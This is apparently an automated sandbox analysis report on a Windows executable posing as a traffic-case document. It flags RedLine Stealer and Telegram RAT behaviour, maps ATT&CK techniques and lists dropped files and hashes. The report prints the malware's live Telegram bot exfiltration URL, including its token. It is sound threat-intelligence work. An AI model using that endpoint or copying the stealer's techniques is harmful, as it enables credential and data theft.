Source: Yara match	File source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.5490000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f015e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.3d05d90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f015e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.name.exe.3c50000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.name.exe.33a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.name.exe.3710000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3336864673.0000000003710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3304083272.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3449507339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3449893133.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 11.2.RegSvcs.exe.51d0ee8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f1046.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.5490000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f1046.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.5490000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f015e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.51d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.3d05d90.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.29f015e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.RegSvcs.exe.3d05d90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3842075995.000000000330C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3452111397.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3452111397.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3842075995.000000000328E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4864, type: MEMORYSTR

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C26596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_00C26596
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C26A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00C26A5A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A36596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	8_2_00A36596
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A36A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	8_2_00A36A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	121 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	221 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	1 Credentials in Registry	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 Software Packing	NTDS	48 System Information Discovery	Distributed Component Object Model	221 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	312 Process Injection	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	4 Clipboard Data	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	11 Masquerading	Cached Domain Credentials	121 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	121 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	312 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Case_Your company bad driver Vehicle No.exe	67%	Virustotal		Browse
Case_Your company bad driver Vehicle No.exe	61%	ReversingLabs	Win32.Spyware.RedLine
Case_Your company bad driver Vehicle No.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\directory\name.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/sendDocument	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://account.dyn.com/	RegSvcs.exe, 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp	false	high
https://api.telegram.org	RegSvcs.exe, 0000000B.00000002.3452111397.0000000002D07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3452111397.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3842075995.00000000032D7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3842075995.0000000003490000.00000004.00000800.00020000.00000000.sdmp	false	high
http://api.telegram.org	RegSvcs.exe, 0000000B.00000002.3452111397.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3842075995.00000000032E9000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 0000000B.00000002.3452111397.0000000002D07000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3842075995.00000000032D7000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot7166327996:AAGPihVNd1ShcG_CmE24Dqt8T2_CJLtBA7k/	RegSvcs.exe, 0000000B.00000002.3478077990.00000000051D0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3452111397.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3477412077.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3451674428.00000000029B0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3478826370.0000000005490000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.3842075995.000000000328E000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1436302
Start date and time:	2024-05-04 10:01:36 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Case_Your company bad driver Vehicle No.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@14/12@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 61 Number of non-executed functions: 271
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:05:41	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs
10:05:50	API Interceptor	240x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
149.154.167.220	Hesaphareketi-01.exe	Get hash	malicious	AgentTesla	Browse
	FACTURAS-ALBARANES.exe	Get hash	malicious	AgentTesla	Browse
	Invoice _ 2357.exe	Get hash	malicious	AgentTesla	Browse
	FACTURAS-ALBARANES.exe	Get hash	malicious	AgentTesla	Browse
	nP050NMmkE.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.BackDoor.AgentTeslaNET.1.32598.19649.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	https://mandrillapp.com/track/click/31140489/aazenterprise.com?p=eyJzIjoiNUJvNUhtZmVHb2F5TEhHSWo4U3JuemNCVDJBIiwidiI6MSwicCI6IntcInVcIjozMTE0MDQ4OSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FhemVudGVycHJpc2UuY29tXFxcL2lucXVpcnkuaHRtbD93aGl0ZT1aR1YyY21sbGJtUjBMbUpsY25SQVpHVnRaUzFuY205MWNDNWpiMjA9XCIsXCJpZFwiOlwiNTQ2NzE3YTVmZjkwNDc2Zjk4NzEyMzQ3MjYwNGUyYThcIixcInVybF9pZHNcIjpbXCI1N2JjZTAyMmU5NDQ5ODNjNzcxODk1ZTUzYThjYmMzZDdhNmZhZmEyXCJdfSJ9	Get hash	malicious	HTMLPhisher	Browse
	Advice Ref A231k6Q1L2GQ.exe	Get hash	malicious	AgentTesla	Browse
	ENQUIRY_debloat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.telegram.org	Hesaphareketi-01.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	LFfjUMuUFU.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, XWorm	Browse	149.154.167.220
	FACTURAS-ALBARANES.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Invoice _ 2357.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	FACTURAS-ALBARANES.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	nP050NMmkE.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.BackDoor.AgentTeslaNET.1.32598.19649.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	https://mandrillapp.com/track/click/31140489/aazenterprise.com?p=eyJzIjoiNUJvNUhtZmVHb2F5TEhHSWo4U3JuemNCVDJBIiwidiI6MSwicCI6IntcInVcIjozMTE0MDQ4OSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FhemVudGVycHJpc2UuY29tXFxcL2lucXVpcnkuaHRtbD93aGl0ZT1aR1YyY21sbGJtUjBMbUpsY25SQVpHVnRaUzFuY205MWNDNWpiMjA9XCIsXCJpZFwiOlwiNTQ2NzE3YTVmZjkwNDc2Zjk4NzEyMzQ3MjYwNGUyYThcIixcInVybF9pZHNcIjpbXCI1N2JjZTAyMmU5NDQ5ODNjNzcxODk1ZTUzYThjYmMzZDdhNmZhZmEyXCJdfSJ9	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Advice Ref A231k6Q1L2GQ.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	ENQUIRY_debloat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Hesaphareketi-01.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	FACTURAS-ALBARANES.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Invoice _ 2357.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	FACTURAS-ALBARANES.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	nP050NMmkE.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.BackDoor.AgentTeslaNET.1.32598.19649.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	https://mandrillapp.com/track/click/31140489/aazenterprise.com?p=eyJzIjoiNUJvNUhtZmVHb2F5TEhHSWo4U3JuemNCVDJBIiwidiI6MSwicCI6IntcInVcIjozMTE0MDQ4OSxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2FhemVudGVycHJpc2UuY29tXFxcL2lucXVpcnkuaHRtbD93aGl0ZT1aR1YyY21sbGJtUjBMbUpsY25SQVpHVnRaUzFuY205MWNDNWpiMjA9XCIsXCJpZFwiOlwiNTQ2NzE3YTVmZjkwNDc2Zjk4NzEyMzQ3MjYwNGUyYThcIixcInVybF9pZHNcIjpbXCI1N2JjZTAyMmU5NDQ5ODNjNzcxODk1ZTUzYThjYmMzZDdhNmZhZmEyXCJdfSJ9	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	Advice Ref A231k6Q1L2GQ.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	ENQUIRY_debloat.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	DHL EXPRESS.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	DHL_VTER000105453.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	DHL_VTER000105450.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	DHL Receipt_AWB 9899691321..exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	Arrival Notice.pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	Hesaphareketi-01.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	E7236252-receipt.vbs	Get hash	malicious	XWorm	Browse	149.154.167.220
	invoice PDF -2024.gz.vbs	Get hash	malicious	Unknown	Browse	149.154.167.220
	I7336446-receipt.vbs	Get hash	malicious	XWorm	Browse	149.154.167.220
	S94847456-receipt.vbs	Get hash	malicious	XWorm	Browse	149.154.167.220
	S847453-receipt.vbs	Get hash	malicious	XWorm	Browse	149.154.167.220

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	272384
Entropy (8bit):	7.913240434952622
Encrypted:	false
SSDEEP:	6144:L6E9IYagxxuZH66DvQlh8w0xnYCN6xALhkgkEsyXP2X88kg1JGE6DPaB:LxIrvZH66DYUwOYC9L5k2/Q8DgrGDw
MD5:	75ABA1B582B41A624E9796CD32A94B0D
SHA1:	02C4A92B7D90F9670A97031FE4D5694E906FE4FA
SHA-256:	02D4E24CAFF3927B2D67D58D2298D30E518466B592F2307BDB1E4F0A2BC8DCFB
SHA-512:	C372B1982D9BF8FCFFE24208A204845DF83E6FFA45DD9A2771D168439F4C53510288EB0F64B2181BD6A57991CE61B93F4B6ACD6634C0E17021A1F7C79EDEE1CE
Malicious:	false
Reputation:	low
Preview:	...DJCWP430W.YR.M44AQBW.SNDICWP030W8ZYROM44AQBWNSNDICWP030W.ZYRAR.:A.K.o.O..b.8Y@.'J5> . .W ?,8:s,!i1">.Z^w\|..r""PQo\O]jSNDICWPX#.z.+.,c<.Jm .)\|p1:v2..;..).+.,c<.J. .)\|p :U2....Y).+.,}nOJl .).:-,e2..030W8ZYROM44AQBW'[W"ICWP`v0Wt[]R;.4dAQBWNSND.CtQ;29W8.XRO.64AQBWa.NDISWP0.1W8Z.RO]44ASBWKSNDICWP530W8ZYRO=04AUBW.hLDKCW.03 W8JYROM$4AABWNSNDYCWP030W8ZYR.X64.QBWN3LD.EUP030W8ZYROM44AQBWNSNDICWP..1W$ZYROM44AQBWNSNDICWP030W8ZYR.@64.QBWNSNDICWP0.1W.[YROM44AQBWNSNDICWP030W8ZYRa9QL5QBWV.ODISWP0.1W8^YROM44AQBWNSNDiCW0.AT6L;YR. 44A.CWN=NDI.VP030W8ZYROM44.QB.`7/0(CWP..0W8z[RO[44A[@WNSNDICWP030WxZY.a?GF"QBW.ULDI#UP0;2W8z[ROM44AQBWNSND.CW.030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYR

C:\Users\user\AppData\Local\Temp\aut4F78.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	9992
Entropy (8bit):	7.593662281942129
Encrypted:	false
SSDEEP:	192:m+cKgzEeSCO8vvL3c04qyed8ipotr9EVgR5UPR0NfcnS1YXyfD3IkR:97gQeSCOO3nyed8My9EVgR5UPqNcS1Y4
MD5:	58AED07FF040335A98F3B3C7FA0DA514
SHA1:	555E93C83BE3E35338742F2F26E386188BC30BCF
SHA-256:	DA4332F1E52053BF2DCB7B9028EECA52C65BAF8B7BE984B7DC08B3A611F9708B
SHA-512:	527E58CC88E8BCCEA5A7D53712D5E69CAEE5398D065ED413D00CC6C8811089BDBF42474937CA4C653CE5F91465E43CF063EC484321F8488F71819468DEDEE527
Malicious:	false
Reputation:	low
Preview:	EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........\|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i\|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

C:\Users\user\AppData\Local\Temp\aut5498.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	272384
Entropy (8bit):	7.913240434952622
Encrypted:	false
SSDEEP:	6144:L6E9IYagxxuZH66DvQlh8w0xnYCN6xALhkgkEsyXP2X88kg1JGE6DPaB:LxIrvZH66DYUwOYC9L5k2/Q8DgrGDw
MD5:	75ABA1B582B41A624E9796CD32A94B0D
SHA1:	02C4A92B7D90F9670A97031FE4D5694E906FE4FA
SHA-256:	02D4E24CAFF3927B2D67D58D2298D30E518466B592F2307BDB1E4F0A2BC8DCFB
SHA-512:	C372B1982D9BF8FCFFE24208A204845DF83E6FFA45DD9A2771D168439F4C53510288EB0F64B2181BD6A57991CE61B93F4B6ACD6634C0E17021A1F7C79EDEE1CE
Malicious:	false
Reputation:	low
Preview:	...DJCWP430W.YR.M44AQBW.SNDICWP030W8ZYROM44AQBWNSNDICWP030W.ZYRAR.:A.K.o.O..b.8Y@.'J5> . .W ?,8:s,!i1">.Z^w\|..r""PQo\O]jSNDICWPX#.z.+.,c<.Jm .)\|p1:v2..;..).+.,c<.J. .)\|p :U2....Y).+.,}nOJl .).:-,e2..030W8ZYROM44AQBW'[W"ICWP`v0Wt[]R;.4dAQBWNSND.CtQ;29W8.XRO.64AQBWa.NDISWP0.1W8Z.RO]44ASBWKSNDICWP530W8ZYRO=04AUBW.hLDKCW.03 W8JYROM$4AABWNSNDYCWP030W8ZYR.X64.QBWN3LD.EUP030W8ZYROM44AQBWNSNDICWP..1W$ZYROM44AQBWNSNDICWP030W8ZYR.@64.QBWNSNDICWP0.1W.[YROM44AQBWNSNDICWP030W8ZYRa9QL5QBWV.ODISWP0.1W8^YROM44AQBWNSNDiCW0.AT6L;YR. 44A.CWN=NDI.VP030W8ZYROM44.QB.`7/0(CWP..0W8z[RO[44A[@WNSNDICWP030WxZY.a?GF"QBW.ULDI#UP0;2W8z[ROM44AQBWNSND.CW.030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYROM44AQBWNSNDICWP030W8ZYR

C:\Users\user\AppData\Local\Temp\aut54F6.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	9992
Entropy (8bit):	7.593662281942129
Encrypted:	false
SSDEEP:	192:m+cKgzEeSCO8vvL3c04qyed8ipotr9EVgR5UPR0NfcnS1YXyfD3IkR:97gQeSCOO3nyed8My9EVgR5UPqNcS1Y4
MD5:	58AED07FF040335A98F3B3C7FA0DA514
SHA1:	555E93C83BE3E35338742F2F26E386188BC30BCF
SHA-256:	DA4332F1E52053BF2DCB7B9028EECA52C65BAF8B7BE984B7DC08B3A611F9708B
SHA-512:	527E58CC88E8BCCEA5A7D53712D5E69CAEE5398D065ED413D00CC6C8811089BDBF42474937CA4C653CE5F91465E43CF063EC484321F8488F71819468DEDEE527
Malicious:	false
Reputation:	low
Preview:	EA06..t0.M'.)..e4.N'.).......T9..l.0L.s.5..3..s.4.8.......k8.Yls....c..&S...k6...S....1.L&.i..i5.M,S....K.@...7...p. ....P.o...m.X.V........9....3...f....s2.Xf@.]..g3@..h.m.M.......8.l..6.....a........i4........g3Y...c ._..k4...d....H, ......Ac.H..g...(.F..=d....>....C`....@02..N@...u......Y..ab.M.]>.$....M.x>;$....N.j.;%....X.j.;%......j.;,....P'.b.5... .^..f./Z..@F.6.z..G......`......i..G../Z...zqd...l.;.........\|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i\|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&.X..B.a.Q...sp..X..9..o5..f.!...,vn......d...

C:\Users\user\AppData\Local\Temp\aut5AD0.tmp

Download File

Process:	C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe
File Type:	data
Category:	dropped
Size (bytes):	272384
Entropy (8bit):	7.913240434952622
Encrypted:	false
SSDEEP:	6144:L6E9IYagxxuZH66DvQlh8w0xnYCN6xALhkgkEsyXP2X88kg1JGE6DPaB:LxIrvZH66DYUwOYC9L5k2/Q8DgrGDw
MD5:	75ABA1B582B41A624E9796CD32A94B0D
